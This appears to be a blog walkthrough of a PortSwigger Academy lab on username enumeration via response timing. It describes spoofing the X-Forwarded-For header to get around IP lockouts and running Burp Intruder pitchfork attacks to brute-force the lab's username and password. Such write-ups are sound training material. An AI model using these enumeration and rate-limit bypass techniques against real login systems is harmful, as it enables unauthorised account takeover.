Solving Portswigger Academy:Username enumeration via response timing
In this lab we need to brute force the username first and once we discovered the username we need to brute force password for that user. We already did it it previous lab whats new. So here if username is correct and we supplied some long string in password filed it take long time to response and on top of this our IP get blocked for invalid attempts.
Let’s visit the lab. Objective: ”This lab is vulnerable to username enumeration using its response times. To solve the lab, enumerate a valid username, brute-force this user’s password, then access their account page.”
When we click on My account, we see login page.
Let’s first try with the provided username and password.After login, I sent the POST request to the repeater. First I tried with long password string and noted the response time.
Now lets test same Request with some random username.
If we compare the response time in two requests there is significant difference. The valid user took long time and invalid user took lesser.
Lets try same request few more time for user ‘wiener’.
Trying after around 4 or 5 times, we see the message saying we need to try after 30 minutes.We need to bypass this. While searching I came across this article for rate limiting bypass.
We need to try above headers one-by-one and see the response. Very first header gives same response.
Let’s use another one which is X-Forwarded-For. Ohh! this time there is no warning. So this is the header we need to use.
Now lets figure out after how many attempts we get blocked.So it’s look like after 3 attempts. After that I changed the IP and it start working again.
Send the request to the intruder and this time we have to fuzz two things.
- The last octave of the IP.
- Username with that of provided one.
Also we need to use the Attack type ‘Pitch Fork’. You can find difference between different attack types here.
For first payload I used Numbers.
For another one I used list provided in lab.
Let’s start the attack and see what we will see. For all responses we see response code as 200 OK, length is almost same. But lets arrange the Column Response received. For user ‘activestat’ time is quit long 1354 ms. We found the correct username. Now need to brute force password using same method.
For the word ‘freedom’, we received Response code 302. Which is the correct password.
The main reason behind this vulnerability is:
- Rate limit which can be easily bypassed.
- Different processing time for correct username and incorrect username.
Hope you like it see you in next write-up.
